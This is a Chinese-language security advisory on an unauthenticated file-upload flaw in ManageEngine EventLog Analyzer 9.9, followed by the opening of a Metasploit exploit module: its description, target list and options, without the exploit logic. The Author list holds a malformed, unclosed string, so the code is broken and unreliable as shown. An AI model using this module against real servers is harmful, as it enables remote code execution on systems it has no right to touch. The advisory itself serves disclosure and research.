ManageEngine EventLog Analyzer多个安全漏洞

发布日期：2014-08-31
更新日期：2014-09-03

受影响系统：
ManageEngine EventLog Analyzer 9.9 Build 9002
描述：
--------------------------------------------------------------------------------
BUGTRAQ  ID: 69482

ManageEngine EventLog Analyzer是IT合规性、事件日志管理软件。

EventLog Analyzer 9.9 Build 9002及其他管理在实现上存在任意文件上传漏洞和未授权访问漏洞，攻击者可利用这些漏洞执行任意代码并未授权访问应用。

<*来源：h0ng10
  *>

测试方法：
--------------------------------------------------------------------------------

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！
##
 # This module requires Metasploit: http//metasploit.com/download
 # Current source: https://github.com/rapid7/metasploit-framework
 ##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper
  include Msf::Exploit::EXE

def initialize(info = {})
    super(update_info(info,
      'Name'        => 'ManageEngine Eventlog Analyzer Arbitrary File Upload',
      'Description' => %q{
        This module exploits a file upload vulnerability in ManageEngine Eventlog Analyzer.
        The vulnerability exists in the agentUpload servlet which accepts unauthenticated
        file uploads and handles zip file contents in a insecure way. By combining both
        weaknesses a remote attacker can achieve remote code execution. This module has been
        tested successfully on versions v7.0 - v9.9 b9002 in Windows and Linux. Versions
        between 7.0 and < 8.1 are only exploitable via EAR deployment in the JBoss server,
        while versions 8.1+ are only exploitable via a JSP upload.
      },
      'Author'      =>
        [
          'h0ng10' <
          'Pedro Ribeiro <pedrib[at]gmail.com>', # Vulnerability Discovery and Metasploit module
        ],
      'License'    => MSF_LICENSE,
      'References'  =>
        [
          [ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2014-01.txt' ],
          [ 'URL', 'http://seclists.org/fulldisclosure/2014/Aug/86' ]
        ],
      'DefaultOptions' => { 'WfsDelay' => 5 },
      'Privileged'  => false,            # Privileged on Windows but not on Linux targets
      'Platform'    => %w{ java linux win },
      'Targets'    =>
        [
          [ 'Automatic', { } ],
          [ 'Eventlog Analyzer v7.0 - v8.0 / Java universal',
            {
              'Platform' => 'java',
              'Arch' => ARCH_JAVA,
              'WfsDelay' => 30
            }
          ],
          [ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Windows',
            {
              'Platform' => 'win',
              'Arch' => ARCH_X86
            }
          ],
          [ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Linux',
            {
              'Platform' => 'linux',
              'Arch' => ARCH_X86
            }
          ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 31 2014'))

register_options(
      [
        Opt::RPORT(8400),
        OptInt.new('SLEEP',
          [true, 'Seconds to sleep while we wait for EAR deployment (Java target only)', 15]),
      ], self.class)
  end